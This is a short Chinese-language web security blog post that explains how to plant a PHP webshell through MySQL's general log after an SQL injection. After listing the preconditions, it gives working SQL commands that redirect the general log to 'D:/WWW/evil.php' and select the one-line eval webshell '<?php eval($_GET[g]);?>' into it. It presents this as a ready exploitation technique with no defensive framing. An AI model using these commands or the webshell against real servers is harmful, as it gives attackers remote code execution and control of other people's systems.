WEB安全--SQL注入--利用log写入webshell

一、原理:

这也是对之前文章的补充:WEB安全--SQL注入--INTO OUTFILE-CSDN博客

我们可以通过修改MySQL的log文件,用select关键字写入木马文件放在服务器物理地址中,通过访问物理地址getshell。

二、条件:

用户有写入权限

需要知道物理路径(绝对路径)

需要能执行多行SQL语句

关闭对单引号的转义(GPC)

三、利用方式:

sql 复制代码
show variables like '%general%';            	 # 查看配置
 
set global general_log = on;              		 # 开启general log模式,将所有到达MySQL Server的SQL语句记录下来。
 
set global general_log_file = 'D:/WWW/evil.php'; # 设置日志目录为shell地址
 
select '<?php eval($_GET[g]);?>'             	 # 写入shell
 
set global general_log=off;                  	 # 关闭general log模式
相关推荐
旧时光巷2 小时前
SQL基础⑫ | 视图篇
数据库·sql·学习·mysql·oracle·视图
德迅云安全杨德俊2 小时前
应用加速游戏盾的安全作用
网络·安全·游戏·ddos
跨境卫士情报站3 小时前
亚马逊地址关联暴雷:新算法下的账号安全保卫战
安全·亚马逊跨境电商
Guheyunyi3 小时前
安全风险监测系统是什么?内容有哪些?
大数据·人工智能·深度学习·安全·信息可视化
全知科技3 小时前
API产品升级丨全知科技发布「知影-API风险监测平台」:以AI重构企业数据接口安全治理新范式
大数据·人工智能·科技·安全
谁他个天昏地暗4 小时前
标准SQL语句示例
数据库·sql·oracle
22:30Plane-Moon4 小时前
SQL 查询语法笔记
数据库·笔记·sql
吃不得辣条6 小时前
网络安全笔记
笔记·web安全·智能路由器
Goboy6 小时前
弹窗大战15年祭,零信任iOA的枪口,正对准哪吒的方向盘
安全·程序员·产品
Teamhelper_AR6 小时前
AR眼镜:工业4.0时代高风险作业的安全守护者
安全·ar